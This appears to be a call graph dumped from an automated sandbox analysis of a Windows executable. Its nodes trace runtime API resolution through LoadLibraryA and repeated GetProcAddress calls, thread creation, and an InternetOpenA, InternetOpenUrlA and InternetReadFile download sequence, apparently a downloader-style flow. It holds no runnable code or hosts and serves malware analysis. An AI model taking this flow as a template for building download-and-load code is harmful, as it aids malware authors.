146364 77e6fd 146353->146364 146354 77e9dd 146355 77ea38 InternetOpenA 146354->146355 146366 77ea57 146355->146366 146356 77e908 146358 77e9e5 146356->146358 146359 77e9bb 146356->146359 146419 7d4870 15 API calls 146358->146419 146418 7d4870 15 API calls 146359->146418 146361 77f074 FreeLibrary 146365 77f086 146361->146365 146364->146354 146364->146356 146416 771d90 15 API calls 146364->146416 146417 771de0 20 API calls 146364->146417 146367 77ed23 146366->146367 146368 77ec53 146366->146368 146420 771d90 15 API calls 146366->146420 146421 771de0 20 API calls 146366->146421 146376 77ef66 146367->146376 146383 77f036 146367->146383 146424 771d90 15 API calls 146367->146424 146425 771de0 20 API calls 146367->146425 146370 77ed01 146368->146370 146371 77ed2b 146368->146371 146422 7d4870 15 API calls 146370->146422 146423 7d4870 15 API calls 146371->146423 146377 77f014 146376->146377 146378 77f03e 146376->146378 146426 7d4870 15 API calls 146377->146426 146427 7d4870 15 API calls 146378->146427 146383->146361 146396 77f097 146383->146396 146384 77f2a5 146386 77f352 146384->146386 146387 77f37c 146384->146387 146385 77f6f6 InternetOpenUrlA 146389 77f734 FreeLibrary 146385->146389 146390 77f782 InternetReadFile 146385->146390 146430 7d4870 15 API calls 146386->146430 146431 7d4870 15 API calls 146387->146431 146403 77f75f 146389->146403 146394 77f7b2 146390->146394 146395 77f7bb FreeLibrary 146390->146395 146393 77f374 146400 77f5c9 146393->146400 146407 77f698 std::runtime_error::runtime_error _strlen 146393->146407 146432 771d90 15 API calls 146393->146432 146433 771de0 20 API calls 146393->146433 146394->146390 146394->146395 146412 784c60 146394->146412 146410 77f82a std::ios_base::failure::failure 146395->146410 146396->146384 146396->146393 146428 771d90 15 API calls 146396->146428 146429 771de0 20 API calls 146396->146429 146401 77f676 146400->146401 146402 77f6a0 146400->146402 146434 7d4870 15 API calls 146401->146434 146435 7d4870 15 API calls 146402->146435 146436 774120 39 API calls task 146403->146436 146407->146385 146437 774120 39 API calls task 146410->146437 146413 784ccd 146412->146413 146415 784c80 std::ios_base::failure::failure Concurrency::task_continuation_context::task_continuation_context 146412->146415 146413->146415 146438 7719b0 146413->146438 146415->146394 146416->146364 146417->146364 146418->146354 146419->146354 146420->146366 146421->146366 146422->146367 146423->146367 146424->146367 146425->146367 146426->146383 146427->146383 146428->146396 146429->146396 146430->146393 146431->146393 146432->146393 146433->146393 146434->146407 146435->146407 146436->146365 146437->146365 146439 7719d0 Concurrency::task_continuation_context::task_continuation_context 146438->146439 146441 7719dd Concurrency::cancellation_token_source::~cancellation_token_source Concurrency::task_continuation_context::task_continuation_context 146439->146441 146449 783fc0 41 API calls std::_Xinvalid_argument 146439->146449 146446 7713d0 146441->146446 146443 771a16 std::ios_base::failure::failure Concurrency::cancellation_token_source::~cancellation_token_source Concurrency::task_continuation_context::task_continuation_context 146445 771a89 std::ios_base::failure::failure Concurrency::task_continuation_context::task_continuation_context 146443->146445 146450 783410 39 API calls allocator 146443->146450 146445->146415 146451 7713b0 146446->146451 146448 7713f0 allocator Concurrency::task_continuation_context::task_continuation_context 146448->146443 146449->146441 146450->146445 146454 784bc0 146451->146454 146455 784bd0 allocator 146454->146455 146458 771370 146455->146458 146459 771378 allocator 146458->146459 146460 771396 146459->146460 146461 771388 146459->146461 146463 771391 146460->146463 146473 783220 146460->146473 146465 771460 146461->146465 146463->146448 146466 771477 146465->146466 146467 77147c 146465->146467 146476 783d80 RaiseException stdext::threads::lock_error::lock_error Concurrency::cancel_current_task 146466->146476 146469 783220 allocator 16 API calls 146467->146469 146471 771485 146469->146471 146472 7714a0 146471->146472 146477 7d458f 39 API calls 2 library calls 146471->146477 146472->146463 146478 7cfb05 146473->146478 146476->146467 146480 7cfb0a 146478->146480 146481 78322c 146480->146481 146485 7cfb26 codecvt 146480->146485 146488 7d4a40 146480->146488 146495 7d7694 EnterCriticalSection LeaveCriticalSection codecvt 146480->146495 146481->146463 146483 7d0371 stdext::threads::lock_error::lock_error 146497 7d106c RaiseException 146483->146497 146485->146483 146496 7d106c RaiseException 146485->146496 146486 7d038e 146493 7dac15 __Getctype 146488->146493 146489 7dac53 146499 7d53de 14 API calls __Wcrtomb 146489->146499 146491 7dac3e RtlAllocateHeap 146492 7dac51 146491->146492 146491->146493 146492->146480 146493->146489 146493->146491 146498 7d7694 EnterCriticalSection LeaveCriticalSection codecvt 146493->146498 146495->146480 146496->146483 146497->146486 146498->146493 146499->146492 146500 7cfca5 146504 7cfcb9 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 146500->146504 146501 7cfcbf 146502 7cfd40 146522 7d05aa 146502->146522 146504->146501 146504->146502 146531 7d762e 39 API calls 4 library calls 146504->146531 146508 7cfd4e 146509 7cfd5b 146508->146509 146532 7d05e0 GetModuleHandleW 146509->146532 146511 7cfd62 146512 7cfd66 146511->146512 146513 7cfdd0 146511->146513 146514 7cfd6f 146512->146514 146533 7d816c 21 API calls CallUnexpected 146512->146533 146535 7d81b7 21 API calls CallUnexpected 146513->146535 146534 7cffd0 75 API calls ___scrt_uninitialize_crt 146514->146534 146518 7cfdd6 146536 7d817b 21 API calls CallUnexpected 146518->146536 146519 7cfd77 146519->146501 146521 7cfdde 146537 7d0e90 146522->146537 146524 7d05bd GetStartupInfoW 146525 7cfd46 146524->146525 146526 7d7e0a 146525->146526 146538 7e2f03 146526->146538 146528 7d7e4d 146528->146508 146530 7d7e13 146530->146528 146544 7e31b6 39 API calls 146530->146544 146531->146502 146532->146511 146533->146514 146534->146519 146535->146518 146536->146521 146537->146524 146539 7e2f0c 146538->146539 146540 7e2f3e 146538->146540 146545 7da9ab 146539->146545 146540->146530 146544->146530 146546 7da9bc 146545->146546 146547 7da9b6 146545->146547 146551 7da9c2 146546->146551 146597 7de054 6 API calls std::_Locinfo::_Locinfo_dtor 146546->146597 146596 7de015 6 API calls std::_Locinfo::_Locinfo_dtor 146547->146596 146550 7da9d6 146550->146551 146552 7da9da 146550->146552 146553 7da9c7 146551->146553 146605 7d7134 39 API calls CallUnexpected 146551->146605 146598 7ddb5d 14 API calls 3 library calls 146552->146598 146573 7e2d0e 146553->146573 146556 7da9e6 146558 7da9ee 146556->146558 146559 7daa03 146556->146559 146599 7de054 6 API calls std::_Locinfo::_Locinfo_dtor 146558->146599 146601 7de054 6 API calls std::_Locinfo::_Locinfo_dtor 146559->146601 146562 7daa0f 146563 7daa13 146562->146563 146564 7daa22 146562->146564 146602 7de054 6 API calls std::_Locinfo::_Locinfo_dtor 146563->146602 146603 7da71e 14 API calls __Getctype 146564->146603 146565 7da9fa 146600 7dabdb 14 API calls 2 library calls 146565->146600 146569 7daa2d 146604 7dabdb 14 API calls 2 library calls 146569->146604 146570 7daa00 146570->146551 146572 7daa34 146572->146553 146606 7e2e63 146573->146606 146580 7e2d6a 146642 7dabdb 14 API calls 2 library calls 146580->146642 146581 7e2d78 146631 7e2f61 146581->146631 146584 7e2d51 146584->146540 146586 7e2db0 146643 7d53de 14 API calls __Wcrtomb 146586->146643 146588 7e2df7 146591 7e2e40 146588->146591 146646 7e2987 39 API calls 2 library calls 146588->146646 146589 7e2db5 146644 7dabdb 14 API calls 2 library calls 146589->146644 146590 7e2dcb 146590->146588 146645 7dabdb 14 API calls 2 library calls 146590->146645 146647 7dabdb 14 API calls 2 library calls 146591->146647 146596->146546 146597->146550 146598->146556 146599->146565 146600->146570 146601->146562 146602->146565 146603->146569 146604->146572 146607 7e2e6f ___scrt_is_nonwritable_in_current_image 146606->146607 146608 7e2e89 146607->146608 146648 7d49ca EnterCriticalSection 146607->146648 146610 7e2d38 146608->146610 146651 7d7134 39 API calls CallUnexpected 146608->146651 146617 7e2a95 146610->146617 146611 7e2ec5 146650 7e2ee2 LeaveCriticalSection std::_Lockit::~_Lockit 146611->146650 146615 7e2e99 146615->146611 146649 7dabdb 14 API calls 2 library calls 146615->146649 146652 7d7178 146617->146652 146619 7e2aa7 146620 7e2ac8 146619->146620 146621 7e2ab6 GetOEMCP 146619->146621 146622 7e2adf 146620->146622 146623 7e2acd GetACP 146620->146623 146621->146622 146622->146584 146624 7dac15 146622->146624 146623->146622 146625 7dac53 146624->146625 146629 7dac23 __Getctype 146624->146629 146663 7d53de 14 API calls __Wcrtomb 146625->146663 146627 7dac3e RtlAllocateHeap 146628 7dac51 146627->146628 146627->146629 146628->146580 146628->146581 146629->146625 146629->146627 146662 7d7694 EnterCriticalSection LeaveCriticalSection codecvt 146629->146662 146632 7e2a95 41 API calls 146631->146632 146634 7e2f81 146632->146634 146633 7e3086 146675 7d003d 146633->146675 146634->146633 146635 7e2fbe IsValidCodePage 146634->146635 146639 7e2fd9 __fread_nolock 146634->146639 146635->146633 146638 7e2fd0 146635->146638 146637 7e2da5 146637->146586 146637->146590 146638->146639 146640 7e2ff9 GetCPInfo 146638->146640 146664 7e2b69 146639->146664 146640->146633 146640->146639 146642->146584 146643->146589 146644->146584 146645->146588 146646->146591 146647->146584 146648->146615 146649->146611 146650->146608 146653 7d7196 146652->146653 146659 7da8f0 39 API calls 3 library calls 146653->146659 146655 7d71b7 146660 7dac63 39 API calls __Getctype 146655->146660 146657 7d71cd 146661 7dacc1 39 API calls ctype 146657->146661 146659->146655 146660->146657 146662->146629 146663->146628 146665 7e2b91 GetCPInfo 146664->146665 146674 7e2c5a 146664->146674 146670 7e2ba9 146665->146670 146665->146674 146667 7d003d __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 146669 7e2d0c 146667->146669 146669->146633 146682 7dece1 146670->146682 146673 7defd1 44 API calls 146673->146674 146674->146667 146676 7d0045 146675->146676 146677 7d0046 IsProcessorFeaturePresent 146675->146677 146676->146637 146679 7d072d 146677->146679 146760 7d06f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 146679->146760 146681 7d0810 146681->146637 146683 7d7178 ctype 39 API calls 146682->146683 146684 7ded01 146683->146684 146702 7e1e03 146684->146702 146686 7dedbd 146689 7d003d __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 146686->146689 146687 7dedb5 146705 7cfaaa 14 API calls ___vcrt_freefls@4 146687->146705 146688 7ded2e 146688->146686 146688->146687 146691 7dac15 __fread_nolock 15 API calls 146688->146691 146693 7ded53 __fread_nolock ctype 146688->146693 146692 7dede0 146689->146692 146691->146693 146697 7defd1 146692->146697 146693->146687 146694 7e1e03 ctype MultiByteToWideChar 146693->146694 146695 7ded9c 146694->146695 146695->146687 146696 7deda3 GetStringTypeW 146695->146696 146696->146687 146698 7d7178 ctype 39 API calls 146697->146698 146699 7defe4 146698->146699 146708 7dede2 146699->146708 146706 7e1d6b 146702->146706 146705->146686 146707 7e1d7c MultiByteToWideChar 146706->146707 146707->146688 146709 7dedfd ctype 146708->146709 146710 7e1e03 ctype MultiByteToWideChar 146709->146710 146713 7dee41 146710->146713 146711 7defbc 146712 7d003d __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 146711->146712 146714 7defcf 146712->146714 146713->146711 146715 7dac15 __fread_nolock 15 API calls 146713->146715 146717 7dee67 ctype 146713->146717 146728 7def0f 146713->146728 146714->146673 146715->146717 146718 7e1e03 ctype MultiByteToWideChar 146717->146718 146717->146728 146719 7deeb0 146718->146719 146719->146728 146736 7de1d3 146719->146736 146722 7def1e 146724 7defa7 146722->146724 146727 7dac15 __fread_nolock 15 API calls 146722->146727 146729 7def30 ctype 146722->146729 146723 7deee6 146726 7de1d3 std::_Locinfo::_Locinfo_dtor 7 API calls 146723->146726 146723->146728 146747 7cfaaa 14 API calls ___vcrt_freefls@4 146724->146747 146726->146728 146727->146729 146748 7cfaaa 14 API calls ___vcrt_freefls@4 146728->146748 146729->146724 146730 7de1d3 std::_Locinfo::_Locinfo_dtor 7 API calls 146729->146730 146731 7def73 146730->146731 146731->146724 146745 7e1ebd WideCharToMultiByte _Fputc 146731->146745 146733 7def8d 146733->146724 146734 7def96 146733->146734 146746 7cfaaa 14 API calls ___vcrt_freefls@4 146734->146746 146749 7ddd60 146736->146749 146739 7de20b 146752 7de230 5 API calls std::_Locinfo::_Locinfo_dtor 146739->146752 146740 7de1e4 LCMapStringEx 146744 7de22b 146740->146744 146743 7de224 LCMapStringW 146743->146744 146744->146722 146744->146723 146744->146728 146745->146733 146746->146728 146747->146728 146748->146711 146753 7dde5f 146749->146753 146752->146743 146754 7dde8f 146753->146754 146755 7ddd76 146753->146755 146754->146755 146756 7ddd94 std::_Locinfo::_Locinfo_dtor LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 146754->146756 146755->146739 146755->146740 146757 7ddea3 146756->146757 146757->146755 146758 7ddea9 GetProcAddress 146757->146758 146758->146755 146759 7ddeb9 std::_Locinfo::_Locinfo_dtor 146758->146759 146759->146755 146760->146681 146761 783052 146762 783061 146761->146762 146763 78306a LoadLibraryA CreateThread WaitForSingleObject FreeLibrary 146762->146763 146764 7830ce 146762->146764 146763->146764 146765 38f21f5 99 API calls 146763->146765 146766 775ed9 146776 775ee2 146766->146776 146767 7761f5 LoadLibraryA 146790 77621e 146767->146790 147013 776205 146767->147013 146768 7760de 146770 7761b6 146768->146770 146771 77618c 146768->146771 147184 7d4870 15 API calls 146770->147184 147183 7d4870 15 API calls 146771->147183 146775 7761ae 146775->146767 146776->146768 146776->146775 147181 771d90 15 API calls 146776->147181 147182 771de0 20 API calls 146776->147182 146777 77680d 146778 776854 GetProcAddress 146777->146778 146804 776877 146778->146804 146780 776503 147188 7d4870 15 API calls 146780->147188 146781 7764d9 147187 7d4870 15 API calls 146781->147187 146782 77642c 146782->146780 146782->146781 146787 776815 147192 7d4870 15 API calls 146787->147192 146788 7767eb 147191 7d4870 15 API calls 146788->147191 146789 77673e 146789->146787 146789->146788 146790->146782 146794 7764fb 146790->146794 147185 771d90 15 API calls 146790->147185 147186 771de0 20 API calls 146790->147186 146794->146777 146794->146789 147189 771d90 15 API calls 146794->147189 147190 771de0 20 API calls 146794->147190 146796 776a73 146797 776b21 146796->146797 146798 776b4b 146796->146798 147195 7d4870 15 API calls 146797->147195 147196 7d4870 15 API calls 146798->147196 146799 776d86 146805 776e34 146799->146805 146806 776e5e 146799->146806 146804->146796 146817 776b43 146804->146817 147193 771d90 15 API calls 146804->147193 147194 771de0 20 API calls 146804->147194 147199 7d4870 15 API calls 146805->147199 147200 7d4870 15 API calls 146806->147200 146810 777099 146812 777147 146810->146812 146813 777171 146810->146813 147203 7d4870 15 API calls 146812->147203 147204 7d4870 15 API calls 146813->147204 146817->146799 146825 776e56 146817->146825 147197 771d90 15 API calls 146817->147197 147198 771de0 20 API calls 146817->147198 146819 7773ac 146820 777484 146819->146820 146821 77745a 146819->146821 147208 7d4870 15 API calls 146820->147208 147207 7d4870 15 API calls 146821->147207 146823 7776bf 146828 777797 146823->146828 146829 77776d 146823->146829 146825->146810 146832 777169 146825->146832 147201 771d90 15 API calls 146825->147201 147202 771de0 20 API calls 146825->147202 147212 7d4870 15 API calls 146828->147212 147211 7d4870 15 API calls 146829->147211 146830 7779d2 146836 777a80 146830->146836 146837 777aaa 146830->146837 146832->146819 146838 77747c 146832->146838 147205 771d90 15 API calls 146832->147205 147206 771de0 20 API calls 146832->147206 147215 7d4870 15 API calls 146836->147215 147216 7d4870 15 API calls 146837->147216 146838->146823 146846 77778f 146838->146846 147209 771d90 15 API calls 146838->147209 147210 771de0 20 API calls 146838->147210 146842 777ce5 146844 777d93 146842->146844 146845 777dbd 146842->146845 147219 7d4870 15 API calls 146844->147219 147220 7d4870 15 API calls 146845->147220 146846->146830 146858 777aa2 146846->146858 147213 771d90 15 API calls 146846->147213 147214 771de0 20 API calls 146846->147214 146850 7786ee 146852 778735 GetProcAddress 146850->146852 146891 778758 146852->146891 146853 777ff8 146854 7780a6 146853->146854 146855 7780d0 146853->146855 147223 7d4870 15 API calls 146854->147223 147224 7d4870 15 API calls 146855->147224 146858->146842 146867 777db5 146858->146867 147217 771d90 15 API calls 146858->147217 147218 771de0 20 API calls 146858->147218 146861 7783e3 147228 7d4870 15 API calls 146861->147228 146862 7783b9 147227 7d4870 15 API calls 146862->147227 146863 77830b 146863->146861 146863->146862 146865 77861e 146870 7786f6 146865->146870 146871 7786cc 146865->146871 146867->146853 146873 7780c8 146867->146873 147221 771d90 15 API calls 146867->147221 147222 771de0 20 API calls 146867->147222 147232 7d4870 15 API calls 146870->147232 147231 7d4870 15 API calls 146871->147231 146873->146863 146876 7783db 146873->146876 147225 771d90 15 API calls 146873->147225 147226 771de0 20 API calls 146873->147226 146876->146850 146876->146865 147229 771d90 15 API calls 146876->147229 147230 771de0 20 API calls 146876->147230 146877 778954 146879 778a02 146877->146879 146880 778a2c 146877->146880 147235 7d4870 15 API calls 146879->147235 147236 7d4870 15 API calls 146880->147236 146884 778c67 146886 778d15 146884->146886 146887 778d3f 146884->146887 147239 7d4870 15 API calls 146886->147239 147240 7d4870 15 API calls 146887->147240 146889 778f7a 146894 779052 146889->146894 146895 779028 146889->146895 146891->146877 146900 778a24 146891->146900 147233 771d90 15 API calls 146891->147233 147234 771de0 20 API calls 146891->147234 147244 7d4870 15 API calls 146894->147244 147243 7d4870 15 API calls 146895->147243 146897 7799a1 146903 7799e8 GetProcAddress 146897->146903 146898 77928d 146904 779365 146898->146904 146905 77933b 146898->146905 146900->146884 146908 778d37 146900->146908 147237 771d90 15 API calls 146900->147237 147238 771de0 20 API calls 146900->147238 146941 779a14 146903->146941 147248 7d4870 15 API calls 146904->147248 147247 7d4870 15 API calls 146905->147247 146906 7795a0 146912 77964e 146906->146912 146913 779678 146906->146913 146908->146889 146914 77904a 146908->146914 147241 771d90 15 API calls 146908->147241 147242 771de0 20 API calls 146908->147242 147251 7d4870 15 API calls 146912->147251 147252 7d4870 15 API calls 146913->147252 146914->146898 146924 77935d 146914->146924 147245 771d90 15 API calls 146914->147245 147246 771de0 20 API calls 146914->147246 146918 7798cb 146920 77997f 146918->146920 146921 7799a9 146918->146921 147255 7d4870 15 API calls 146920->147255 147256 7d4870 15 API calls 146921->147256 146924->146906 146926 779670 146924->146926 147249 771d90 15 API calls 146924->147249 147250 771de0 20 API calls 146924->147250 146926->146897 146926->146918 147253 771d90 15 API calls 146926->147253 147254 771de0 20 API calls 146926->147254 146928 779c1f 146929 779cd2 146928->146929 146930 779cfc 146928->146930 147259 7d4870 15 API calls 146929->147259 147260 7d4870 15 API calls 146930->147260 146932 779f4f 146936 77a002 146932->146936 146937 77a02c 146932->146937 147263 7d4870 15 API calls 146936->147263 147264 7d4870 15 API calls 146937->147264 146939 77a27f 146944 77a332 146939->146944 146945 77a35c 146939->146945 146941->146928 146947 779cf4 146941->146947 147257 771d90 15 API calls 146941->147257 147258 771de0 20 API calls 146941->147258 147267 7d4870 15 API calls 146944->147267 147268 7d4870 15 API calls 146945->147268 146947->146932 146954 77a024 146947->146954 147261 771d90 15 API calls 146947->147261 147262 771de0 20 API calls 146947->147262 146951 77a662 147271 7d4870 15 API calls 146951->147271 146952 77a68c 147272 7d4870 15 API calls 146952->147272 146953 77a5af 146953->146951 146953->146952 146954->146939 146964 77a354 146954->146964 147265 771d90 15 API calls 146954->147265 147266 771de0 20 API calls 146954->147266 146958 77a8df 146960 77a992 146958->146960 146961 77a9bc 146958->146961 147275 7d4870 15 API calls 146960->147275 147276 7d4870 15 API calls 146961->147276 146964->146953 146973 77a684 146964->146973 147269 771d90 15 API calls 146964->147269 147270 771de0 20 API calls 146964->147270 146967 77ac0f 146968 77acc2 146967->146968 146969 77acec 146967->146969 147279 7d4870 15 API calls 146968->147279 147280 7d4870 15 API calls 146969->147280 146971 77b674 146976 77b6bb GetProcAddress 146971->146976 146973->146958 146982 77a9b4 146973->146982 147273 771d90 15 API calls 146973->147273 147274 771de0 20 API calls 146973->147274 147017 77b6e7 146976->147017 146977 77af3f 146978 77aff2 146977->146978 146979 77b01c 146977->146979 147283 7d4870 15 API calls 146978->147283 147284 7d4870 15 API calls 146979->147284 146980 77b26f 146986 77b322 146980->146986 146987 77b34c 146980->146987 146982->146967 146988 77ace4 146982->146988 147277 771d90 15 API calls 146982->147277 147278 771de0 20 API calls 146982->147278 147287 7d4870 15 API calls 146986->147287 147288 7d4870 15 API calls 146987->147288 146988->146977 146997 77b014 146988->146997 147281 771d90 15 API calls 146988->147281 147282 771de0 20 API calls 146988->147282 146992 77b59f 146994 77b652 146992->146994 146995 77b67c 146992->146995 147291 7d4870 15 API calls 146994->147291 147292 7d4870 15 API calls 146995->147292 146997->146980 147000 77b344 146997->147000 147285 771d90 15 API calls 146997->147285 147286 771de0 20 API calls 146997->147286 147000->146971 147000->146992 147289 771d90 15 API calls 147000->147289 147290 771de0 20 API calls 147000->147290 147002 77b8f2 147003 77b9a6 147002->147003 147004 77b9d0 147002->147004 147295 7d4870 15 API calls 147003->147295 147296 7d4870 15 API calls 147004->147296 147005 77c68c 147010 77c6e5 FreeLibrary 147005->147010 147057 77c708 147005->147057 147010->147013 147011 77bcd7 147299 7d4870 15 API calls 147011->147299 147012 77bd01 147300 7d4870 15 API calls 147012->147300 147014 77bc23 147014->147011 147014->147012 147015 77bf54 147021 77c032 147015->147021 147022 77c008 147015->147022 147017->147002 147024 77b9c8 147017->147024 147293 771d90 15 API calls 147017->147293 147294 771de0 20 API calls 147017->147294 147304 7d4870 15 API calls 147021->147304 147303 7d4870 15 API calls 147022->147303 147024->147014 147031 77bcf9 147024->147031 147297 771d90 15 API calls 147024->147297 147298 771de0 20 API calls 147024->147298 147028 77c363 147308 7d4870 15 API calls 147028->147308 147029 77c339 147307 7d4870 15 API calls 147029->147307 147030 77c285 147030->147028 147030->147029 147031->147015 147040 77c02a 147031->147040 147301 771d90 15 API calls 147031->147301 147302 771de0 20 API calls 147031->147302 147035 77c5b6 147037 77c694 147035->147037 147038 77c66a 147035->147038 147312 7d4870 15 API calls 147037->147312 147311 7d4870 15 API calls 147038->147311 147040->147030 147043 77c35b 147040->147043 147305 771d90 15 API calls 147040->147305 147306 771de0 20 API calls 147040->147306 147043->147005 147043->147035 147309 771d90 15 API calls 147043->147309 147310 771de0 20 API calls 147043->147310 147045 77c92e 147046 77c9e1 147045->147046 147047 77ca0b 147045->147047 147315 7d4870 15 API calls 147046->147315 147316 7d4870 15 API calls 147047->147316 147052 77cc5e 147053 77cd11 147052->147053 147054 77cd3b 147052->147054 147319 7d4870 15 API calls 147053->147319 147320 7d4870 15 API calls 147054->147320 147055 77cf8e 147061 77d041 147055->147061 147062 77d06b 147055->147062 147057->147045 147063 77ca03 147057->147063 147313 771d90 15 API calls 147057->147313 147314 771de0 20 API calls 147057->147314 147323 7d4870 15 API calls 147061->147323 147324 7d4870 15 API calls 147062->147324 147063->147052 147075 77cd33 147063->147075 147317 771d90 15 API calls 147063->147317 147318 771de0 20 API calls 147063->147318 147067 77d2be 147069 77d371 147067->147069 147070 77d39b 147067->147070 147327 7d4870 15 API calls 147069->147327 147328 7d4870 15 API calls 147070->147328 147075->147055 147080 77d063 147075->147080 147321 771d90 15 API calls 147075->147321 147322 771de0 20 API calls 147075->147322 147076 77d5ee 147077 77d6a1 147076->147077 147078 77d6cb 147076->147078 147331 7d4870 15 API calls 147077->147331 147332 7d4870 15 API calls 147078->147332 147080->147067 147083 77d393 147080->147083 147325 771d90 15 API calls 147080->147325 147326 771de0 20 API calls 147080->147326 147083->147076 147096 77d6c3 147083->147096 147329 771d90 15 API calls 147083->147329 147330 771de0 20 API calls 147083->147330 147085 77d936 147086 77da13 147085->147086 147087 77d9e9 147085->147087 147336 7d4870 15 API calls 147086->147336 147335 7d4870 15 API calls 147087->147335 147092 77dc66 147093 77dd43 147092->147093 147094 77dd19 147092->147094 147340 7d4870 15 API calls 147093->147340 147339 7d4870 15 API calls 147094->147339 147096->147085 147103 77da0b 147096->147103 147333 771d90 15 API calls 147096->147333 147334 771de0 20 API calls 147096->147334 147100 77df96 147101 77e073 147100->147101 147102 77e049 147100->147102 147344 7d4870 15 API calls 147101->147344 147343 7d4870 15 API calls 147102->147343 147103->147092 147115 77dd3b 147103->147115 147337 771d90 15 API calls 147103->147337 147338 771de0 20 API calls 147103->147338 147107 77e9dd 147109 77ea38 InternetOpenA 147107->147109 147137 77ea57 147109->147137 147110 77e2c6 147111 77e3a3 147110->147111 147112 77e379 147110->147112 147348 7d4870 15 API calls 147111->147348 147347 7d4870 15 API calls 147112->147347 147115->147100 147124 77e06b 147115->147124 147341 771d90 15 API calls 147115->147341 147342 771de0 20 API calls 147115->147342 147118 77e5de 147119 77e6b5 147118->147119 147120 77e68b 147118->147120 147352 7d4870 15 API calls 147119->147352 147351 7d4870 15 API calls 147120->147351 147122 77e908 147127 77e9e5 147122->147127 147128 77e9bb 147122->147128 147124->147110 147132 77e39b 147124->147132 147345 771d90 15 API calls 147124->147345 147346 771de0 20 API calls 147124->147346 147356 7d4870 15 API calls 147127->147356 147355 7d4870 15 API calls 147128->147355 147130 77f097 147154 77f2a5 147130->147154 147178 77f374 147130->147178 147365 771d90 15 API calls 147130->147365 147366 771de0 20 API calls 147130->147366 147131 77f074 FreeLibrary 147131->147013 147132->147118 147136 77e6ad 147132->147136 147349 771d90 15 API calls 147132->147349 147350 771de0 20 API calls 147132->147350 147135 77ed23 147138 77ef66 147135->147138 147153 77f036 147135->147153 147361 771d90 15 API calls 147135->147361 147362 771de0 20 API calls 147135->147362 147136->147107 147136->147122 147353 771d90 15 API calls 147136->147353 147354 771de0 20 API calls 147136->147354 147137->147135 147139 77ec53 147137->147139 147357 771d90 15 API calls 147137->147357 147358 771de0 20 API calls 147137->147358 147147 77f014 147138->147147 147148 77f03e 147138->147148 147141 77ed01 147139->147141 147142 77ed2b 147139->147142 147359 7d4870 15 API calls 147141->147359 147360 7d4870 15 API calls 147142->147360 147363 7d4870 15 API calls 147147->147363 147364 7d4870 15 API calls 147148->147364 147153->147130 147153->147131 147156 77f352 147154->147156 147157 77f37c 147154->147157 147155 77f6f6 InternetOpenUrlA 147159 77f734 FreeLibrary 147155->147159 147160 77f782 InternetReadFile 147155->147160 147367 7d4870 15 API calls 147156->147367 147368 7d4870 15 API calls 147157->147368 147171 77f75f 147159->147171 147163 77f7b2 147160->147163 147164 77f7bb FreeLibrary 147160->147164 147163->147160 147163->147164 147167 784c60 std::ios_base::failure::failure 41 API calls 147163->147167 147179 77f82a std::ios_base::failure::failure 147164->147179 147167->147163 147168 77f5c9 147169 77f676 147168->147169 147170 77f6a0 147168->147170 147371 7d4870 15 API calls 147169->147371 147372 7d4870 15 API calls 147170->147372 147373 774120 39 API calls task 147171->147373 147175 77f698 std::runtime_error::runtime_error _strlen 147175->147155 147178->147168 147178->147175 147369 771d90 15 API calls 147178->147369 147370 771de0 20 API calls 147178->147370 147374 774120 39 API calls task 147179->147374 147181->146776 147182->146776 147183->146775 147184->146775 147185->146790 147186->146790 147187->146794 147188->146794 147189->146794 147190->146794 147191->146777 147192->146777 147193->146804 147194->146804 147195->146817 147196->146817 147197->146817 147198->146817 147199->146825 147200->146825 147201->146825 147202->146825 147203->146832 147204->146832 147205->146832 147206->146832 147207->146838 147208->146838 147209->146838 147210->146838 147211->146846 147212->146846 147213->146846 147214->146846 147215->146858 147216->146858 147217->146858 147218->146858 147219->146867 147220->146867 147221->146867 147222->146867 147223->146873 147224->146873 147225->146873 147226->146873 147227->146876 147228->146876 147229->146876 147230->146876 147231->146850 147232->146850 147233->146891 147234->146891 147235->146900 147236->146900 147237->146900 147238->146900 147239->146908 147240->146908 147241->146908 147242->146908 147243->146914 147244->146914 147245->146914 147246->146914 147247->146924 147248->146924 147249->146924 147250->146924 147251->146926 147252->146926 147253->146926 147254->146926 147255->146897 147256->146897 147257->146941 147258->146941 147259->146947 147260->146947 147261->146947 147262->146947 147263->146954 147264->146954 147265->146954 147266->146954 147267->146964 147268->146964 147269->146964 147270->146964 147271->146973 147272->146973 147273->146973 147274->146973 147275->146982 147276->146982 147277->146982 147278->146982 147279->146988 147280->146988 147281->146988 147282->146988 147283->146997 147284->146997 147285->146997 147286->146997 147287->147000 147288->147000 147289->147000 147290->147000 147291->146971 147292->146971 147293->147017 147294->147017 147295->147024 147296->147024 147297->147024 147298->147024 147299->147031 147300->147031 147301->147031 147302->147031 147303->147040 147304->147040 147305->147040 147306->147040 147307->147043 147308->147043 147309->147043 147310->147043 147311->147005 147312->147005 147313->147057 147314->147057 147315->147063 147316->147063 147317->147063 147318->147063 147319->147075 147320->147075 147321->147075 147322->147075 147323->147080 147324->147080 147325->147080 147326->147080 147327->147083 147328->147083 147329->147083 147330->147083 147331->147096 147332->147096 147333->147096 147334->147096 147335->147103 147336->147103 147337->147103 147338->147103 147339->147115 147340->147115 147341->147115 147342->147115 147343->147124 147344->147124 147345->147124 147346->147124 147347->147132 147348->147132 147349->147132 147350->147132 147351->147136 147352->147136 147353->147136 147354->147136 147355->147107 147356->147107 147357->147137 147358->147137 147359->147135 147360->147135 147361->147135 147362->147135 147363->147153 147364->147153 147365->147130 147366->147130 147367->147178 147368->147178 147369->147178 147370->147178 147371->147175 147372->147175 147373->147013 147374->147013
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
